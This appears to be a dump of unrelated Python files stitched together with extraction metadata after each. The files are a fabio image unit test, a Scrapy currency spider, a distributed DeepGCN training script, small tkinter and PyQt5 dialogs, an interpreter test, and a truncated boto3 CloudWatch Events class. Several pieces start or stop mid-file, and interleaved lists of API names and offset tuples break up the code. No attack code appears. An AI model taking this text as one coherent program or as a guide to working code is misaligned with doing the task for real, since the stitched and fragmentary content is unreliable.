class TestMpa(unittest.TestCase):
"""
Test classe for multiwire (mpa) images
"""
TESTIMAGES = [
# filename dim1 dim2 min max mean stddev
("mpa_test.mpa", 1024, 1024, 0, 1295, 0.8590, 18.9393),
]
def test_read(self):
"""
Test the reading of multiwire images
"""
for imageData in self.TESTIMAGES:
name, dim1, dim2, mini, maxi, mean, stddev = imageData
shape = dim2, dim1
logger.debug("Processing: %s" % name)
path = UtilsTest.getimage(name + ".bz2")[:-4]
obj = fabio.mpaimage.MpaImage()
obj.read(path)
self.assertAlmostEqual(mini, obj.getmin(), 2, "getmin [%s,%s]" % (mini, obj.getmin()))
self.assertAlmostEqual(maxi, obj.getmax(), 2, "getmax [%s,%s]" % (maxi, obj.getmax()))
self.assertAlmostEqual(mean, obj.getmean(), 2, "getmean [%s,%s]" % (mean, obj.getmean()))
self.assertAlmostEqual(stddev, obj.getstddev(), 2, "getstddev [%s,%s]" % (stddev, obj.getstddev()))
self.assertEqual(shape, obj.shape)
def suite():
loadTests = unittest.defaultTestLoader.loadTestsFromTestCase
testsuite = unittest.TestSuite()
testsuite.addTest(loadTests(TestMpa))
return testsuite
if __name__ == '__main__':
runner = unittest.TextTestRunner()
runner.run(suite())
| [
"logging.getLogger",
"unittest.TestSuite",
"unittest.TextTestRunner",
"fabio.mpaimage.MpaImage"
] | [((1074, 1101), 'logging.getLogger', 'logging.getLogger', (['__name__'], {}), '(__name__)\n', (1091, 1101), False, 'import logging\n'), ((2354, 2374), 'unittest.TestSuite', 'unittest.TestSuite', ([], {}), '()\n', (2372, 2374), False, 'import unittest\n'), ((2480, 2505), 'unittest.TextTestRunner', 'unittest.TextTestRunner', ([], {}), '()\n', (2503, 2505), False, 'import unittest\n'), ((1745, 1770), 'fabio.mpaimage.MpaImage', 'fabio.mpaimage.MpaImage', ([], {}), '()\n', (1768, 1770), False, 'import fabio\n')] |
# -*- coding: utf-8 -*-
import scrapy
import codecs
import sys
#리눅스상에서 utf-8 로 파일에 내용을 기록하려면 시스템 기본 인코딩으 ㄹutf-8 로 설정해야함
reload(sys)
sys.setdefaultencoding('utf8')
# scrapy 에서 spider 는 crawling/scrapping을 담당하는 핵심부분
#crawling/scrapping 절차에 대한 정의를 하는 부분
class CurrSpider(scrapy.Spider):
name = 'currSpider'
start_urls = ['http://finance.naver.com/marketindex/?tabSel=exchange#tab_section']
def parse(self, response):
ranks = response.css('span.blind::text').extract()
titles = response.css('span.value::text').extract()
with codecs.open('curr.csv','w','utf-8') as f:
# 처리결과 저장하기위해
# movierank.csv 라는 이름으로 쓰기 모드로 open
# for i in range(0,4):
# rank = ranks[i].replace('\r\n', ' ')
# rank = ''.join(rank.split())
print(ranks)
# title = titles[i].replace('\r\n', ' ')
# title = title.strip().encode('utf-8')
print(titles)
f.write('%s,%s\n' % (ranks, titles))
f.close() | [
"codecs.open",
"sys.setdefaultencoding"
] | [((132, 162), 'sys.setdefaultencoding', 'sys.setdefaultencoding', (['"""utf8"""'], {}), "('utf8')\n", (154, 162), False, 'import sys\n'), ((565, 602), 'codecs.open', 'codecs.open', (['"""curr.csv"""', '"""w"""', '"""utf-8"""'], {}), "('curr.csv', 'w', 'utf-8')\n", (576, 602), False, 'import codecs\n')] |
import __init__
import os
#os.environ['LD_LIBRARY_PATH'] += ':/usr/local/cuda-11.1/bin64:/usr/local/cuda-11.2/bin64'
import numpy as np
import torch
import torch.multiprocessing as mp
import torch_geometric.datasets as GeoData
from torch_geometric.loader import DenseDataLoader
import torch_geometric.transforms as T
from torch.nn.parallel import DistributedDataParallel
from torch.utils.data.distributed import DistributedSampler
from config import OptInit
from architecture import DenseDeepGCN, CustomDenseDeepGCN
from utils.ckpt_util import load_pretrained_models, load_pretrained_optimizer, save_checkpoint
from utils.metrics import AverageMeter
import logging
from tqdm import tqdm
from parallel_wrapper import launch
import comm
from torch.utils.tensorboard import SummaryWriter
writer = SummaryWriter(log_dir='log/mlp4')
def train(model, train_loader, optimizer, criterion, opt, cur_rank):
opt.losses.reset()
model.train()
with tqdm(train_loader) as tqdm_loader:
for i, data in enumerate(tqdm_loader):
opt.iter += 1
desc = 'Epoch:{} Iter:{} [{}/{}] Loss:{Losses.avg: .4f}'\
.format(opt.epoch, opt.iter, i + 1, len(train_loader), Losses=opt.losses)
tqdm_loader.set_description(desc)
inputs = torch.cat((data.pos.transpose(2, 1).unsqueeze(3), data.x.transpose(2, 1).unsqueeze(3)), 1)
gt = data.y.to(opt.device)
# ------------------ zero, output, loss
optimizer.zero_grad()
out = model(inputs)
loss = criterion(out, gt)
# ------------------ optimization
loss.backward()
optimizer.step()
opt.losses.update(loss.item())
def test(model, loader, opt, cur_rank):
Is = np.empty((len(loader), opt.n_classes))
Us = np.empty((len(loader), opt.n_classes))
model.eval()
with torch.no_grad():
for i, data in enumerate(tqdm(loader)):
inputs = torch.cat((data.pos.transpose(2, 1).unsqueeze(3), data.x.transpose(2, 1).unsqueeze(3)), 1)
gt = data.y
out = model(inputs)
pred = out.max(dim=1)[1]
pred_np = pred.cpu().numpy()
target_np = gt.cpu().numpy()
for cl in range(opt.n_classes):
cur_gt_mask = (target_np == cl)
cur_pred_mask = (pred_np == cl)
I = np.sum(np.logical_and(cur_pred_mask, cur_gt_mask), dtype=np.float32)
U = np.sum(np.logical_or(cur_pred_mask, cur_gt_mask), dtype=np.float32)
Is[i, cl] = I
Us[i, cl] = U
ious = np.divide(np.sum(Is, 0), np.sum(Us, 0))
ious[np.isnan(ious)] = 1
iou = np.mean(ious)
if opt.phase == 'test':
for cl in range(opt.n_classes):
logging.info("===> mIOU for class {}: {}".format(cl, ious[cl]))
opt.test_value = iou
logging.info('TEST Epoch: [{}]\t mIoU: {:.4f}\t'.format(opt.epoch, opt.test_value))
def epochs(opt):
logging.info('===> Creating dataloader ...')
train_dataset = GeoData.S3DIS(opt.data_dir, opt.area, True, pre_transform=T.NormalizeScale())
train_sampler = DistributedSampler(train_dataset, shuffle=True, seed=opt.seed)
train_loader = DenseDataLoader(train_dataset, batch_size=opt.batch_size, shuffle=False, sampler = train_sampler, num_workers=opt.n_gpus)
test_dataset = GeoData.S3DIS(opt.data_dir, opt.area, train=False, pre_transform=T.NormalizeScale())
test_sampler = DistributedSampler(test_dataset, shuffle=False, seed=opt.seed)
test_loader = DenseDataLoader(test_dataset, batch_size=opt.batch_size, shuffle=False, sampler = test_sampler, num_workers=opt.n_gpus)
opt.n_classes = train_loader.dataset.num_classes
cur_rank = comm.get_local_rank()
logging.info('===> Loading the network ...')
model = DistributedDataParallel(CustomDenseDeepGCN(opt).to(cur_rank),device_ids=[cur_rank], output_device=cur_rank,broadcast_buffers=False).to(cur_rank)
logging.info('===> loading pre-trained ...')
model, opt.best_value, opt.epoch = load_pretrained_models(model, opt.pretrained_model, opt.phase)
logging.info(model)
logging.info('===> Init the optimizer ...')
criterion = torch.nn.CrossEntropyLoss().to(cur_rank)
optimizer = torch.optim.Adam(model.parameters(), lr=opt.lr)
scheduler = torch.optim.lr_scheduler.StepLR(optimizer, opt.lr_adjust_freq, opt.lr_decay_rate)
optimizer, scheduler, opt.lr = load_pretrained_optimizer(opt.pretrained_model, optimizer, scheduler, opt.lr)
logging.info('===> Init Metric ...')
opt.losses = AverageMeter()
opt.test_value = 0.
logging.info('===> start training ...')
for _ in range(opt.epoch, opt.total_epochs):
opt.epoch += 1
train_sampler.set_epoch(opt.epoch)
test_sampler.set_epoch(opt.epoch)
logging.info('Epoch:{}'.format(opt.epoch))
train(model, train_loader, optimizer, criterion, opt, cur_rank)
if opt.epoch % opt.eval_freq == 0 and opt.eval_freq != -1:
test(model, test_loader, opt, cur_rank)
scheduler.step()
if comm.is_main_process():
# ------------------ save checkpoints
# min or max. based on the metrics
is_best = (opt.test_value < opt.best_value)
opt.best_value = max(opt.test_value, opt.best_value)
model_cpu = {k: v.cpu() for k, v in model.state_dict().items()}
save_checkpoint({
'epoch': opt.epoch,
'state_dict': model_cpu,
'optimizer_state_dict': optimizer.state_dict(),
'scheduler_state_dict': scheduler.state_dict(),
'best_value': opt.best_value,
}, is_best, opt.ckpt_dir, opt.exp_name)
# ------------------ tensorboard log
info = {
'loss': opt.losses.avg,
'test_value': opt.test_value,
'lr': scheduler.get_lr()[0]
}
writer.add_scalar('Train Loss', info['loss'], opt.epoch)
writer.add_scalar('Test IOU', info['test_value'], opt.epoch)
writer.add_scalar('lr', info['lr'], opt.epoch)
logging.info('Saving the final model.Finish!')
def hola():
print('Hola')
def main():
opt = OptInit().get_args()
'''
This wrapper taken from detectron2 (https://github.com/facebookresearch/detectron2/blob/main/detectron2/engine/launch.py),
creates n_gpus processes and launches epochs function on each of them.
'''
launch(
epochs,
num_gpus_per_machine=opt.n_gpus,
num_machines=1,
machine_rank=0,
dist_url='auto',
args=(opt,)
)
#epochs(opt)
if __name__ == '__main__':
main() | [
"utils.metrics.AverageMeter",
"torch.nn.CrossEntropyLoss",
"torch.utils.data.distributed.DistributedSampler",
"logging.info",
"torch.utils.tensorboard.SummaryWriter",
"numpy.mean",
"config.OptInit",
"comm.is_main_process",
"comm.get_local_rank",
"numpy.isnan",
"parallel_wrapper.launch",
"utils... | [((799, 832), 'torch.utils.tensorboard.SummaryWriter', 'SummaryWriter', ([], {'log_dir': '"""log/mlp4"""'}), "(log_dir='log/mlp4')\n", (812, 832), False, 'from torch.utils.tensorboard import SummaryWriter\n'), ((2714, 2727), 'numpy.mean', 'np.mean', (['ious'], {}), '(ious)\n', (2721, 2727), True, 'import numpy as np\n'), ((3013, 3057), 'logging.info', 'logging.info', (['"""===> Creating dataloader ..."""'], {}), "('===> Creating dataloader ...')\n", (3025, 3057), False, 'import logging\n'), ((3176, 3238), 'torch.utils.data.distributed.DistributedSampler', 'DistributedSampler', (['train_dataset'], {'shuffle': '(True)', 'seed': 'opt.seed'}), '(train_dataset, shuffle=True, seed=opt.seed)\n', (3194, 3238), False, 'from torch.utils.data.distributed import DistributedSampler\n'), ((3258, 3381), 'torch_geometric.loader.DenseDataLoader', 'DenseDataLoader', (['train_dataset'], {'batch_size': 'opt.batch_size', 'shuffle': '(False)', 'sampler': 'train_sampler', 'num_workers': 'opt.n_gpus'}), '(train_dataset, batch_size=opt.batch_size, shuffle=False,\n sampler=train_sampler, num_workers=opt.n_gpus)\n', (3273, 3381), False, 'from torch_geometric.loader import DenseDataLoader\n'), ((3503, 3565), 'torch.utils.data.distributed.DistributedSampler', 'DistributedSampler', (['test_dataset'], {'shuffle': '(False)', 'seed': 'opt.seed'}), '(test_dataset, shuffle=False, seed=opt.seed)\n', (3521, 3565), False, 'from torch.utils.data.distributed import DistributedSampler\n'), ((3584, 3705), 'torch_geometric.loader.DenseDataLoader', 'DenseDataLoader', (['test_dataset'], {'batch_size': 'opt.batch_size', 'shuffle': '(False)', 'sampler': 'test_sampler', 'num_workers': 'opt.n_gpus'}), '(test_dataset, batch_size=opt.batch_size, shuffle=False,\n sampler=test_sampler, num_workers=opt.n_gpus)\n', (3599, 3705), False, 'from torch_geometric.loader import DenseDataLoader\n'), ((3773, 3794), 'comm.get_local_rank', 'comm.get_local_rank', ([], {}), '()\n', (3792, 3794), False, 'import comm\n'), 
((3800, 3844), 'logging.info', 'logging.info', (['"""===> Loading the network ..."""'], {}), "('===> Loading the network ...')\n", (3812, 3844), False, 'import logging\n'), ((4007, 4051), 'logging.info', 'logging.info', (['"""===> loading pre-trained ..."""'], {}), "('===> loading pre-trained ...')\n", (4019, 4051), False, 'import logging\n'), ((4091, 4153), 'utils.ckpt_util.load_pretrained_models', 'load_pretrained_models', (['model', 'opt.pretrained_model', 'opt.phase'], {}), '(model, opt.pretrained_model, opt.phase)\n', (4113, 4153), False, 'from utils.ckpt_util import load_pretrained_models, load_pretrained_optimizer, save_checkpoint\n'), ((4158, 4177), 'logging.info', 'logging.info', (['model'], {}), '(model)\n', (4170, 4177), False, 'import logging\n'), ((4183, 4226), 'logging.info', 'logging.info', (['"""===> Init the optimizer ..."""'], {}), "('===> Init the optimizer ...')\n", (4195, 4226), False, 'import logging\n'), ((4365, 4451), 'torch.optim.lr_scheduler.StepLR', 'torch.optim.lr_scheduler.StepLR', (['optimizer', 'opt.lr_adjust_freq', 'opt.lr_decay_rate'], {}), '(optimizer, opt.lr_adjust_freq, opt.\n lr_decay_rate)\n', (4396, 4451), False, 'import torch\n'), ((4482, 4559), 'utils.ckpt_util.load_pretrained_optimizer', 'load_pretrained_optimizer', (['opt.pretrained_model', 'optimizer', 'scheduler', 'opt.lr'], {}), '(opt.pretrained_model, optimizer, scheduler, opt.lr)\n', (4507, 4559), False, 'from utils.ckpt_util import load_pretrained_models, load_pretrained_optimizer, save_checkpoint\n'), ((4565, 4601), 'logging.info', 'logging.info', (['"""===> Init Metric ..."""'], {}), "('===> Init Metric ...')\n", (4577, 4601), False, 'import logging\n'), ((4619, 4633), 'utils.metrics.AverageMeter', 'AverageMeter', ([], {}), '()\n', (4631, 4633), False, 'from utils.metrics import AverageMeter\n'), ((4663, 4702), 'logging.info', 'logging.info', (['"""===> start training ..."""'], {}), "('===> start training ...')\n", (4675, 4702), False, 'import logging\n'), ((6557, 
6670), 'parallel_wrapper.launch', 'launch', (['epochs'], {'num_gpus_per_machine': 'opt.n_gpus', 'num_machines': '(1)', 'machine_rank': '(0)', 'dist_url': '"""auto"""', 'args': '(opt,)'}), "(epochs, num_gpus_per_machine=opt.n_gpus, num_machines=1,\n machine_rank=0, dist_url='auto', args=(opt,))\n", (6563, 6670), False, 'from parallel_wrapper import launch\n'), ((953, 971), 'tqdm.tqdm', 'tqdm', (['train_loader'], {}), '(train_loader)\n', (957, 971), False, 'from tqdm import tqdm\n'), ((1891, 1906), 'torch.no_grad', 'torch.no_grad', ([], {}), '()\n', (1904, 1906), False, 'import torch\n'), ((2645, 2658), 'numpy.sum', 'np.sum', (['Is', '(0)'], {}), '(Is, 0)\n', (2651, 2658), True, 'import numpy as np\n'), ((2660, 2673), 'numpy.sum', 'np.sum', (['Us', '(0)'], {}), '(Us, 0)\n', (2666, 2673), True, 'import numpy as np\n'), ((2684, 2698), 'numpy.isnan', 'np.isnan', (['ious'], {}), '(ious)\n', (2692, 2698), True, 'import numpy as np\n'), ((5138, 5160), 'comm.is_main_process', 'comm.is_main_process', ([], {}), '()\n', (5158, 5160), False, 'import comm\n'), ((6213, 6259), 'logging.info', 'logging.info', (['"""Saving the final model.Finish!"""'], {}), "('Saving the final model.Finish!')\n", (6225, 6259), False, 'import logging\n'), ((1941, 1953), 'tqdm.tqdm', 'tqdm', (['loader'], {}), '(loader)\n', (1945, 1953), False, 'from tqdm import tqdm\n'), ((3136, 3154), 'torch_geometric.transforms.NormalizeScale', 'T.NormalizeScale', ([], {}), '()\n', (3152, 3154), True, 'import torch_geometric.transforms as T\n'), ((3464, 3482), 'torch_geometric.transforms.NormalizeScale', 'T.NormalizeScale', ([], {}), '()\n', (3480, 3482), True, 'import torch_geometric.transforms as T\n'), ((4243, 4270), 'torch.nn.CrossEntropyLoss', 'torch.nn.CrossEntropyLoss', ([], {}), '()\n', (4268, 4270), False, 'import torch\n'), ((6314, 6323), 'config.OptInit', 'OptInit', ([], {}), '()\n', (6321, 6323), False, 'from config import OptInit\n'), ((2413, 2455), 'numpy.logical_and', 'np.logical_and', 
(['cur_pred_mask', 'cur_gt_mask'], {}), '(cur_pred_mask, cur_gt_mask)\n', (2427, 2455), True, 'import numpy as np\n'), ((2502, 2543), 'numpy.logical_or', 'np.logical_or', (['cur_pred_mask', 'cur_gt_mask'], {}), '(cur_pred_mask, cur_gt_mask)\n', (2515, 2543), True, 'import numpy as np\n'), ((3881, 3904), 'architecture.CustomDenseDeepGCN', 'CustomDenseDeepGCN', (['opt'], {}), '(opt)\n', (3899, 3904), False, 'from architecture import DenseDeepGCN, CustomDenseDeepGCN\n')] |
import tkinter as tk
from tkinter import ttk
win = tk.Tk()
win.title("Python GUI")
win.resizable(False, False)
win.configure(background = "grey94")
a_label = ttk.Label(win, text = "Gib Deinen Namen ein:")
a_label.grid(column = 0, row = 0)
a_label.grid_configure(padx = 8, pady = 8)
def clickMe():
action.configure(text = "Hallöchen " + name.get())
name = tk.StringVar()
name_entered = ttk.Entry(win, width = 12, textvariable = name)
name_entered.grid(column = 0, row = 1)
name_entered.grid_configure(padx = 8, pady = 8)
name_entered.focus()
action = ttk.Button(win, text = "Drück mich!", command = clickMe)
action.grid(column = 1, row = 1)
action.grid_configure(padx = 8, pady = 8)
win.mainloop() | [
"tkinter.ttk.Button",
"tkinter.ttk.Entry",
"tkinter.ttk.Label",
"tkinter.StringVar",
"tkinter.Tk"
] | [((52, 59), 'tkinter.Tk', 'tk.Tk', ([], {}), '()\n', (57, 59), True, 'import tkinter as tk\n'), ((160, 204), 'tkinter.ttk.Label', 'ttk.Label', (['win'], {'text': '"""Gib Deinen Namen ein:"""'}), "(win, text='Gib Deinen Namen ein:')\n", (169, 204), False, 'from tkinter import ttk\n'), ((363, 377), 'tkinter.StringVar', 'tk.StringVar', ([], {}), '()\n', (375, 377), True, 'import tkinter as tk\n'), ((393, 436), 'tkinter.ttk.Entry', 'ttk.Entry', (['win'], {'width': '(12)', 'textvariable': 'name'}), '(win, width=12, textvariable=name)\n', (402, 436), False, 'from tkinter import ttk\n'), ((559, 611), 'tkinter.ttk.Button', 'ttk.Button', (['win'], {'text': '"""Drück mich!"""', 'command': 'clickMe'}), "(win, text='Drück mich!', command=clickMe)\n", (569, 611), False, 'from tkinter import ttk\n')] |
# -*- coding: utf-8 -*-
# Form implementation generated from reading ui file 'src/gui/ui_paste_dialog.ui'
#
# Created by: PyQt5 UI code generator 5.11.2
#
# WARNING! All changes made in this file will be lost!
from PyQt5 import QtCore, QtGui, QtWidgets
class Ui_PasteDialog(object):
def setupUi(self, PasteDialog):
PasteDialog.setObjectName("PasteDialog")
PasteDialog.resize(403, 205)
self.gridLayout = QtWidgets.QGridLayout(PasteDialog)
self.gridLayout.setContentsMargins(11, 11, 11, 11)
self.gridLayout.setSpacing(6)
self.gridLayout.setObjectName("gridLayout")
self.buttonGroupMain = QtWidgets.QGroupBox(PasteDialog)
self.buttonGroupMain.setObjectName("buttonGroupMain")
self.radioReplaceSelection = QtWidgets.QRadioButton(self.buttonGroupMain)
self.radioReplaceSelection.setGeometry(QtCore.QRect(10, 40, 120, 20))
self.radioReplaceSelection.setObjectName("radioReplaceSelection")
self.radioAddLines = QtWidgets.QRadioButton(self.buttonGroupMain)
self.radioAddLines.setGeometry(QtCore.QRect(10, 20, 100, 20))
self.radioAddLines.setChecked(True)
self.radioAddLines.setObjectName("radioAddLines")
self.gridLayout.addWidget(self.buttonGroupMain, 0, 0, 1, 1)
self.buttonGroupReplace = QtWidgets.QGroupBox(PasteDialog)
self.buttonGroupReplace.setEnabled(False)
self.buttonGroupReplace.setObjectName("buttonGroupReplace")
self.verticalLayout = QtWidgets.QVBoxLayout(self.buttonGroupReplace)
self.verticalLayout.setContentsMargins(11, 11, 11, 11)
self.verticalLayout.setSpacing(6)
self.verticalLayout.setObjectName("verticalLayout")
self.radioSelectionOnly = QtWidgets.QRadioButton(self.buttonGroupReplace)
self.radioSelectionOnly.setObjectName("radioSelectionOnly")
self.verticalLayout.addWidget(self.radioSelectionOnly)
self.radioSelectionAndReplace = QtWidgets.QRadioButton(self.buttonGroupReplace)
self.radioSelectionAndReplace.setObjectName("radioSelectionAndReplace")
self.verticalLayout.addWidget(self.radioSelectionAndReplace)
self.radioSelectionAndAdd = QtWidgets.QRadioButton(self.buttonGroupReplace)
self.radioSelectionAndAdd.setChecked(True)
self.radioSelectionAndAdd.setObjectName("radioSelectionAndAdd")
self.verticalLayout.addWidget(self.radioSelectionAndAdd)
self.gridLayout.addWidget(self.buttonGroupReplace, 0, 1, 2, 1)
self.buttonGroupAdd = QtWidgets.QGroupBox(PasteDialog)
self.buttonGroupAdd.setEnabled(True)
self.buttonGroupAdd.setObjectName("buttonGroupAdd")
self.radioAfterSelection = QtWidgets.QRadioButton(self.buttonGroupAdd)
self.radioAfterSelection.setGeometry(QtCore.QRect(10, 40, 130, 20))
self.radioAfterSelection.setObjectName("radioAfterSelection")
self.radioBeforeSelection = QtWidgets.QRadioButton(self.buttonGroupAdd)
self.radioBeforeSelection.setGeometry(QtCore.QRect(10, 20, 140, 20))
self.radioBeforeSelection.setChecked(True)
self.radioBeforeSelection.setObjectName("radioBeforeSelection")
self.gridLayout.addWidget(self.buttonGroupAdd, 1, 0, 1, 1)
self.pushOk = QtWidgets.QPushButton(PasteDialog)
self.pushOk.setObjectName("pushOk")
self.gridLayout.addWidget(self.pushOk, 2, 0, 1, 1)
self.pushCancel = QtWidgets.QPushButton(PasteDialog)
self.pushCancel.setObjectName("pushCancel")
self.gridLayout.addWidget(self.pushCancel, 2, 1, 1, 1)
self.retranslateUi(PasteDialog)
self.pushOk.clicked.connect(PasteDialog.accept)
self.pushCancel.clicked.connect(PasteDialog.reject)
self.radioAddLines.toggled['bool'].connect(self.buttonGroupAdd.setEnabled)
self.radioReplaceSelection.toggled['bool'].connect(self.buttonGroupReplace.setEnabled)
QtCore.QMetaObject.connectSlotsByName(PasteDialog)
def retranslateUi(self, PasteDialog):
_translate = QtCore.QCoreApplication.translate
PasteDialog.setWindowTitle(_translate("PasteDialog", "Paste mode"))
self.buttonGroupMain.setTitle(_translate("PasteDialog", "Pasting mode"))
self.radioReplaceSelection.setText(_translate("PasteDialog", "Replace selection"))
self.radioAddLines.setText(_translate("PasteDialog", "Add lines"))
self.buttonGroupReplace.setTitle(_translate("PasteDialog", "How do you want to replace lines ?"))
self.radioSelectionOnly.setText(_translate("PasteDialog", "Selection only"))
self.radioSelectionAndReplace.setText(_translate("PasteDialog", "If selection is too small, replace\n"
"the lines after"))
self.radioSelectionAndAdd.setText(_translate("PasteDialog", "If selection is too small, \n"
"add new lines"))
self.buttonGroupAdd.setTitle(_translate("PasteDialog", "Where do you want to add lines ?"))
self.radioAfterSelection.setText(_translate("PasteDialog", "After selection"))
self.radioBeforeSelection.setText(_translate("PasteDialog", "Before selection"))
self.pushOk.setText(_translate("PasteDialog", "OK"))
self.pushCancel.setText(_translate("PasteDialog", "Cancel"))
| [
"PyQt5.QtCore.QMetaObject.connectSlotsByName",
"PyQt5.QtWidgets.QRadioButton",
"PyQt5.QtCore.QRect",
"PyQt5.QtWidgets.QGridLayout",
"PyQt5.QtWidgets.QGroupBox",
"PyQt5.QtWidgets.QVBoxLayout",
"PyQt5.QtWidgets.QPushButton"
] | [((434, 468), 'PyQt5.QtWidgets.QGridLayout', 'QtWidgets.QGridLayout', (['PasteDialog'], {}), '(PasteDialog)\n', (455, 468), False, 'from PyQt5 import QtCore, QtGui, QtWidgets\n'), ((649, 681), 'PyQt5.QtWidgets.QGroupBox', 'QtWidgets.QGroupBox', (['PasteDialog'], {}), '(PasteDialog)\n', (668, 681), False, 'from PyQt5 import QtCore, QtGui, QtWidgets\n'), ((781, 825), 'PyQt5.QtWidgets.QRadioButton', 'QtWidgets.QRadioButton', (['self.buttonGroupMain'], {}), '(self.buttonGroupMain)\n', (803, 825), False, 'from PyQt5 import QtCore, QtGui, QtWidgets\n'), ((1007, 1051), 'PyQt5.QtWidgets.QRadioButton', 'QtWidgets.QRadioButton', (['self.buttonGroupMain'], {}), '(self.buttonGroupMain)\n', (1029, 1051), False, 'from PyQt5 import QtCore, QtGui, QtWidgets\n'), ((1326, 1358), 'PyQt5.QtWidgets.QGroupBox', 'QtWidgets.QGroupBox', (['PasteDialog'], {}), '(PasteDialog)\n', (1345, 1358), False, 'from PyQt5 import QtCore, QtGui, QtWidgets\n'), ((1507, 1553), 'PyQt5.QtWidgets.QVBoxLayout', 'QtWidgets.QVBoxLayout', (['self.buttonGroupReplace'], {}), '(self.buttonGroupReplace)\n', (1528, 1553), False, 'from PyQt5 import QtCore, QtGui, QtWidgets\n'), ((1753, 1800), 'PyQt5.QtWidgets.QRadioButton', 'QtWidgets.QRadioButton', (['self.buttonGroupReplace'], {}), '(self.buttonGroupReplace)\n', (1775, 1800), False, 'from PyQt5 import QtCore, QtGui, QtWidgets\n'), ((1972, 2019), 'PyQt5.QtWidgets.QRadioButton', 'QtWidgets.QRadioButton', (['self.buttonGroupReplace'], {}), '(self.buttonGroupReplace)\n', (1994, 2019), False, 'from PyQt5 import QtCore, QtGui, QtWidgets\n'), ((2205, 2252), 'PyQt5.QtWidgets.QRadioButton', 'QtWidgets.QRadioButton', (['self.buttonGroupReplace'], {}), '(self.buttonGroupReplace)\n', (2227, 2252), False, 'from PyQt5 import QtCore, QtGui, QtWidgets\n'), ((2542, 2574), 'PyQt5.QtWidgets.QGroupBox', 'QtWidgets.QGroupBox', (['PasteDialog'], {}), '(PasteDialog)\n', (2561, 2574), False, 'from PyQt5 import QtCore, QtGui, QtWidgets\n'), ((2715, 2758), 'PyQt5.QtWidgets.QRadioButton', 
'QtWidgets.QRadioButton', (['self.buttonGroupAdd'], {}), '(self.buttonGroupAdd)\n', (2737, 2758), False, 'from PyQt5 import QtCore, QtGui, QtWidgets\n'), ((2941, 2984), 'PyQt5.QtWidgets.QRadioButton', 'QtWidgets.QRadioButton', (['self.buttonGroupAdd'], {}), '(self.buttonGroupAdd)\n', (2963, 2984), False, 'from PyQt5 import QtCore, QtGui, QtWidgets\n'), ((3274, 3308), 'PyQt5.QtWidgets.QPushButton', 'QtWidgets.QPushButton', (['PasteDialog'], {}), '(PasteDialog)\n', (3295, 3308), False, 'from PyQt5 import QtCore, QtGui, QtWidgets\n'), ((3438, 3472), 'PyQt5.QtWidgets.QPushButton', 'QtWidgets.QPushButton', (['PasteDialog'], {}), '(PasteDialog)\n', (3459, 3472), False, 'from PyQt5 import QtCore, QtGui, QtWidgets\n'), ((3931, 3981), 'PyQt5.QtCore.QMetaObject.connectSlotsByName', 'QtCore.QMetaObject.connectSlotsByName', (['PasteDialog'], {}), '(PasteDialog)\n', (3968, 3981), False, 'from PyQt5 import QtCore, QtGui, QtWidgets\n'), ((873, 902), 'PyQt5.QtCore.QRect', 'QtCore.QRect', (['(10)', '(40)', '(120)', '(20)'], {}), '(10, 40, 120, 20)\n', (885, 902), False, 'from PyQt5 import QtCore, QtGui, QtWidgets\n'), ((1091, 1120), 'PyQt5.QtCore.QRect', 'QtCore.QRect', (['(10)', '(20)', '(100)', '(20)'], {}), '(10, 20, 100, 20)\n', (1103, 1120), False, 'from PyQt5 import QtCore, QtGui, QtWidgets\n'), ((2804, 2833), 'PyQt5.QtCore.QRect', 'QtCore.QRect', (['(10)', '(40)', '(130)', '(20)'], {}), '(10, 40, 130, 20)\n', (2816, 2833), False, 'from PyQt5 import QtCore, QtGui, QtWidgets\n'), ((3031, 3060), 'PyQt5.QtCore.QRect', 'QtCore.QRect', (['(10)', '(20)', '(140)', '(20)'], {}), '(10, 20, 140, 20)\n', (3043, 3060), False, 'from PyQt5 import QtCore, QtGui, QtWidgets\n')] |
from yalul.interpreters.environment import Environment
from yalul.interpreters.expressions.var_assignment_interpreter import VarAssignmentInterpreter
from yalul.interpreters.interpreter_errors import InterpreterErrors
class TestVarAssignmentInterpreter:
"""Test var assignment expression interpreter"""
def test_interpreting_var_assignment_without_errors(self):
"""
Validates if VarAssignmentInterpreter is interpreting correctly
"""
error = InterpreterErrors()
env = Environment({}, {})
env.add_variable('Name', 'Gabriela')
interpreter = VarAssignmentInterpreter('Name', 'Otavio', env, error)
response = interpreter.execute()
assert response == 'Otavio'
assert env.get_variable('Name') == 'Otavio'
assert error.errors == []
def test_interpreting_var_assignment_errors(self):
"""
Validates if VarAssignmentInterpreter is generating errors when variable don't exists
"""
error = InterpreterErrors()
env = Environment({}, {})
interpreter = VarAssignmentInterpreter('Name', 'Otavio', env, error)
response = interpreter.execute()
assert response is None
assert error.errors == ['Interpreter Error: Can\'t assign value Otavio to variable named "Name" because it '
'doesn\'t exists']
| [
"yalul.interpreters.expressions.var_assignment_interpreter.VarAssignmentInterpreter",
"yalul.interpreters.environment.Environment",
"yalul.interpreters.interpreter_errors.InterpreterErrors"
] | [((485, 504), 'yalul.interpreters.interpreter_errors.InterpreterErrors', 'InterpreterErrors', ([], {}), '()\n', (502, 504), False, 'from yalul.interpreters.interpreter_errors import InterpreterErrors\n'), ((519, 538), 'yalul.interpreters.environment.Environment', 'Environment', (['{}', '{}'], {}), '({}, {})\n', (530, 538), False, 'from yalul.interpreters.environment import Environment\n'), ((608, 662), 'yalul.interpreters.expressions.var_assignment_interpreter.VarAssignmentInterpreter', 'VarAssignmentInterpreter', (['"""Name"""', '"""Otavio"""', 'env', 'error'], {}), "('Name', 'Otavio', env, error)\n", (632, 662), False, 'from yalul.interpreters.expressions.var_assignment_interpreter import VarAssignmentInterpreter\n'), ((1018, 1037), 'yalul.interpreters.interpreter_errors.InterpreterErrors', 'InterpreterErrors', ([], {}), '()\n', (1035, 1037), False, 'from yalul.interpreters.interpreter_errors import InterpreterErrors\n'), ((1052, 1071), 'yalul.interpreters.environment.Environment', 'Environment', (['{}', '{}'], {}), '({}, {})\n', (1063, 1071), False, 'from yalul.interpreters.environment import Environment\n'), ((1095, 1149), 'yalul.interpreters.expressions.var_assignment_interpreter.VarAssignmentInterpreter', 'VarAssignmentInterpreter', (['"""Name"""', '"""Otavio"""', 'env', 'error'], {}), "('Name', 'Otavio', env, error)\n", (1119, 1149), False, 'from yalul.interpreters.expressions.var_assignment_interpreter import VarAssignmentInterpreter\n')] |
import boto3
from django.conf import settings
from backend.models import CloudWatchEvent
import json
class Events:
    """Thin wrapper around the CloudWatch Events API for rules managed by
    Naruko (every managed rule name carries the 'NARUKO-' prefix)."""

    def __init__(self):
        # boto3 CloudWatch Events client pinned to the configured region.
        self.client = boto3.client('events', region_name=settings.NARUKO_REGION)

